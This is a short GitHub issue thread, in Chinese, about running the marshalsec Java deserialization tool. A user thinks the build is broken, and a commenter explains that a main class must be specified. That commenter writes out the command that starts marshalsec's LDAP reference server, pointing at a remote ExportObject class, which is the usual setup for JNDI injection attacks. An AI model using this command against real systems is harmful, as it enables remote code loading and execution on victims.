### ISSUE TITLE
谁能帮我看看，我这是编译的有问题还是什么原因？

### ISSUE THREAD

**Issue by F1xing** [mbechler/marshalsec#23]
![image](https://user-images.githubusercontent.com/31611714/137240122-37cf68b7-8509-4b7e-a983-2c868b61c36b.png)

**Comment by askar882** [comment]
```sh
java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.<Marshaller> [-a] [-v] [-t] [<gadget_type> [<arguments...>]]
```

**Comment by F1xing** [comment]
![image](https://user-images.githubusercontent.com/31611714/137244690-4bc1606c-c3ff-48ac-955e-66cb21b87e22.png)

**Comment by G3G4X5X6** [comment]
我在 IDEA 中执行这个命令是没有问题的
![image](https://user-images.githubusercontent.com/87740076/146145460-5fe9342f-47f9-40d9-a877-d7ad21d6bfef.png)

**Comment by hunterxxn** [comment]
这不是编译问题，编译成功了，你执行的时候没指定主类，看一下源码，你打的jar包里不止一个主类，这不是个spring项目
开启ldap方法
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://ip:8080/文件夹/#ExportObject 8088
